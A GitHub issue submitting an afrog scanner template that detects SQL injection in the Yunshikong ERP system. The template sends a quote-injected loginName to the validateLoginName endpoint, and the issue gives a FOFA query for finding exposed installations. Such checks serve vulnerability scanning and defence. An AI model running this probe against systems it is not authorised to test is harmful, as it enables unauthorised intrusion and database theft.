Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

yunshikong-ERP-SQL-injection #62

Open
laohuan12138 opened this issue May 7, 2023 · 0 comments
Open

yunshikong-ERP-SQL-injection #62

laohuan12138 opened this issue May 7, 2023 · 0 comments
Labels
afrog-poc afrog poc issue submit

Comments

@laohuan12138
Copy link

id: yunshikong-ERP-SQL-injection
info:
  name: yunshikong-ERP-SQL-injection
  author: laohuan12138
  severity: high
  description: |
    云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
    FOFA: title="云时空社会化商业ERP"
  reference:
    - https://wiki.peiqi.tech/wiki/webapp/云时空ERP/云时空%20社会化商业ERP系统%20validateLoginName%20SQL注入漏洞.html
rules:
  r0:
    request:
      method: GET
      path: /sys/user/validateLoginName?loginName=admin'
    expression: response.status == 500 && response.body.bcontains(b"SQLException")
expression: r0()

Snipaste_2023-05-07_13-22-23

@zan8in zan8in added the afrog-poc afrog poc issue submit label May 8, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
afrog-poc afrog poc issue submit
Projects
None yet
Development

No branches or pull requests

2 participants